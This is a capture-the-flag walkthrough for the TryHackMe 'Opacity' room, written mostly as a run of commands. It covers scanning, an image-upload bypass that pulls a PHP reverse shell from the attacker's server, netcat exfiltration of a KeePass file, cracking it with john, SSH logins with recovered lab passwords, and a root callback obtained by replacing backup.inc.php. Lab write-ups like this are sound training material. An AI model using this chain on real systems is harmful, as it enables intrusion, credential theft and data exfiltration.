Room Link: https://tryhackme.com/room/opacity
Initial Scan
Kali
Scan all ports
No other ports found
Kali
Copy nmap -sV -sT -O -p 1-65535 $VICTIM TCP/80 - HTTP
Kali
Copy gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt Found this page, I tried different extensions but it looks like it only accepts extentsions that images uses such as .jpg and .png
Initial Shell
Kali
Copy git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php Kali #1
Copy python2 -m SimpleHTTPServer 81 Kali #2
Browser
Copy http://$KALI:81/php-reverse-shell.php#.jpg Get autocomplete
Copy python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg Transfer file
In /opt we find a keepass file so I transfered back to Kali to try to crack it
Kali(receiving)
Copy nc -l -p 1234 > dataset.kdbx Victim(sending)
Copy nc -w 3 $KALI 1234 < dataset.kdbx
Crack KeePass
Kali
Copy /opt/john/keepass2john dataset.kdbx > johnkeepass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt johnkeepass.txt Kali
Copy keepassx dataset.kdbx
Password: 741852963 TCP/22 - SSH
Kali
Copy ssh sysadmin@$VICTIM
Password: Cl0udP4ss40p4city#8700 PSPY
Kali
Copy wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81 Victim
Copy wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32
The script calls backup.inc.php in the lib folder, we can't edit this file but we can delete it and replace it so I copied the same php reverse shell script that was used before and replaced backup. After that I just waited until the script ran on its own.
Kali #1
Copy wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81 Victim
Copy rm -f backup.inc.php
wget http://10.10.215.36:81/php-reverse-shell.php
cp php-reverse-shell.php backup.inc.php Kali #2
